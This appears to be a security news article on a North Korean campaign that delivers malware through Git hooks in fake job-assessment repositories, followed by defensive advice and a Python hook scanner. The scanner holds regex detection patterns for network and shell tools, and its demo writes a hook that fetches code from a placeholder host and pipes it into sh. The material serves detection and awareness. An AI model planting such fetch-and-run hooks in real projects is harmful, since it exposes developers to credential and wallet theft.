North Korean Hackers Use Git Hooks for Cross-Platform Malware Attacks

David kimber
May 12, 2026 · 4 min read

Key Takeaways

  • North Korean threat actors, specifically the Lazarus Group, are leveraging Git hooks to deliver cross-platform malware.
  • The attacks target software developers via fake job offers on platforms like LinkedIn, luring them into cloning malicious GitHub repositories.
  • The malware, deployed as a “pre-commit” Git hook, is designed to steal cryptocurrency wallets and credentials and to establish persistent access on Windows, macOS, and Linux systems.
  • This campaign, an evolution of the “Contagious Interview” operation, highlights a sophisticated shift toward weaponizing developer tools for initial access and payload delivery.

A new, highly sophisticated campaign attributed to North Korean state-sponsored hackers has emerged, demonstrating a significant evolution in their tactics. Rather than relying on traditional attack vectors, these threat actors are now embedding malicious code directly within Git hooks, a core feature of the version control system widely used by software developers. This strategic shift allows for the deployment of cross-platform malware by exploiting the very tools essential to modern development workflows.

Table Of Content

  • Key Takeaways
  • Git Hooks: A Covert Delivery Mechanism
  • Cross-Platform Malware and Persistence
  • What You Should Do

This operation is a continuation of the long-running “Contagious Interview” campaign, previously linked to the notorious Lazarus Group. The attackers initiate contact with software developers on professional networking sites, such as LinkedIn, under the guise of legitimate recruitment opportunities. Following initial engagement, victims are presented with a technical coding assessment hosted on a GitHub repository. The moment a developer clones this repository, the infection chain is initiated.

Researchers at OpenSourceMalware were the first to identify and detail this novel technique. Their analysis revealed that the malicious script is concealed within the repository’s .githooks directory, specifically as a pre-commit hook. This design ensures that the payload executes automatically when the developer attempts to commit code, even before the commit object is fully written to the repository. The subtle nature of this attack, combined with developers’ inherent trust in job-related coding tasks, makes it particularly challenging to detect in its early stages.

Git Hooks: A Covert Delivery Mechanism

The deployed malware is cross-platform. Upon activation, the hook script identifies the victim’s operating system, then silently contacts a remote command-and-control (C2) server to fetch the matching payload. Windows users receive one malware variant, while macOS and Linux users receive a different, tailored version.

Regardless of the operating system, the objectives of the attack remain the same: exfiltrate cryptocurrency wallet data, harvest sensitive user credentials, and establish a persistent backdoor for remote access to the compromised machine.

Git hooks are an integral feature of Git, the distributed version control system used by virtually every developer. They are scripts that Git runs automatically at predefined points in the workflow. Legitimate uses include enforcing coding standards, running automated tests, or validating commit messages before code is integrated.

In this malicious campaign, the Lazarus Group strategically places a harmful pre-commit hook within the GitHub repository provided to job candidates. The script itself is intentionally minimalist and appears benign upon superficial inspection. When a developer proceeds with a code commit, the hook silently runs in the background. It first fingerprints the operating system, then establishes contact with a remote server whose domain is crafted to mimic legitimate developer infrastructure.

The C2 server then delivers an OS-specific payload. For macOS and Linux systems, a shell script is provided, whereas Windows machines receive a batch-compatible payload. Both variants install persistent implants capable of stealing credentials, siphoning funds from cryptocurrency wallets, and maintaining communication with the attackers. All these malicious activities occur while the developer perceives a normal, successful commit operation.

Cross-Platform Malware and Persistence

The adaptability of this campaign across multiple operating systems is a notable feature. Most malware is designed with a single OS in mind, but this attack seamlessly delivers customized payloads for macOS, Linux, and Windows from a unified entry point. This level of operational flexibility underscores the capabilities of a well-resourced and experienced threat group, indicative of significant investment in maintaining active and sophisticated campaigns.

The implants utilized in this campaign are associated with known malware families previously employed by the Lazarus Group, including BeaverTail and InvisibleFerret. These tools are equipped with a range of functionalities, such as keylogging, remote access capabilities, browser data exfiltration, and general file theft. Furthermore, researchers have observed the use of “post-checkout” hooks. These hooks execute whenever a developer switches branches within the repository, providing the malware with additional opportunities to re-execute and maintain persistence without overt user interaction.

What You Should Do

  • Exercise Extreme Caution with External Repositories: Treat any code repository received as part of a job application or from an unknown source as potentially malicious until thoroughly vetted.
  • Inspect .githooks Directories: Before interacting with a new repository, manually inspect the .githooks directory for any suspicious scripts, especially pre-commit or post-checkout hooks. Look for unfamiliar commands, external network connections, or obfuscated code.
  • Utilize Isolated Environments: Clone and execute unknown repositories within isolated virtual machines or sandboxed environments that do not contain sensitive data or credentials.
  • Implement Organization-Wide Git Hook Policies: For development teams, establish and enforce policies for Git hook usage, potentially disallowing local hooks or requiring central management and approval of hook scripts.
  • Monitor Network Traffic for Anomalies: Implement network monitoring to detect unusual outbound connections from developer workstations, particularly those originating from Git-related processes.
  • Educate Developers on Social Engineering: Conduct regular training on social engineering tactics, especially those involving fake job offers or technical assessments designed to deliver malware.
  • Report Suspicious Activity: Share any identified malicious Git hook patterns or related Indicators of Compromise (IoCs) with threat intelligence platforms and the wider security community to aid in rapid response and defense.
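The following scanner is an added example for the inspection and hook-policy items above; it is not code from the article or from OpenSourceMalware. It assumes standard Git behaviour: scripts in an in-tree .githooks directory do not run unless core.hooksPath points at them, so the scanner reports which directory is actually active and flags hook scripts that fetch from the network, fingerprint the OS, decode or eval embedded data, or pipe downloads into a shell. The sample repository, hook names and domain are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Client-side hook names; pre-commit and post-checkout are the two the article reports abused.
HOOK_NAMES = {"pre-commit", "post-checkout", "post-merge", "pre-push", "post-commit",
              "prepare-commit-msg", "commit-msg", "pre-rebase", "pre-auto-gc"}
# Behaviour a linter/test hook should not need: network fetches, OS fingerprinting,
# decoding or eval of embedded blobs, and piping downloaded content into a shell.
SUSPICIOUS = {
    "network": re.compile(r"\b(curl|wget|nc|certutil|Invoke-WebRequest|iwr)\b|urllib|requests\.", re.I),
    "os_fingerprint": re.compile(r"\buname\b|\$OSTYPE|platform\.system|%OS%", re.I),
    "decode_or_eval": re.compile(r"\b(base64|eval|xxd|Invoke-Expression|iex)\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|python3?|powershell)\b", re.I),
}

def active_hooks_dir(repo: Path) -> Path:
    """Directory Git will actually run hooks from: .git/hooks unless core.hooksPath overrides it.
    In-tree hooks (e.g. .githooks) only fire once that config line exists, so it is itself a signal."""
    cfg = repo / ".git" / "config"
    m = re.search(r"^\s*hooksPath\s*=\s*(.+)$", cfg.read_text(), re.M) if cfg.exists() else None
    p = Path(m.group(1).strip()) if m else Path(".git/hooks")
    return p if p.is_absolute() else repo / p

def scan_repo(repo: Path) -> list:
    """One finding per hook script in the active hooks dir or an in-tree .githooks dir."""
    active = active_hooks_dir(repo).resolve()
    findings = []
    for hook_dir in {active, (repo / ".githooks").resolve()}:
        if not hook_dir.is_dir():
            continue
        for f in sorted(hook_dir.iterdir()):
            if f.name not in HOOK_NAMES or not f.is_file():   # skips *.sample and stray files
                continue
            text = f.read_text(errors="replace")
            hits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(text))
            findings.append({"hook": f.name, "active": hook_dir == active, "indicators": hits})
    return findings

def build_demo_repo() -> Path:
    """Constructed sample: a benign lint hook beside a post-checkout using the fetch-by-OS pattern;
    the repo config activates .githooks via core.hooksPath, as an assessment's setup steps might."""
    repo = Path(tempfile.mkdtemp())
    (repo / ".git").mkdir()
    (repo / ".git" / "config").write_text("[core]\n\thooksPath = .githooks\n")
    (hooks := repo / ".githooks").mkdir()
    (hooks / "pre-commit").write_text("#!/bin/sh\nnpx eslint . && npm test\n")
    (hooks / "post-checkout").write_text(  # placeholder domain, constructed for the demo
        '#!/bin/sh\ncurl -fsSL "https://cdn.example.invalid/$(uname -s)" | sh\n')
    return repo
```

Pointing core.hooksPath at a centrally managed directory (`git config --global core.hooksPath /path/to/approved-hooks`) is one way to implement the policy item, and the scanner will then report that directory as the active one for every checkout.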

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.
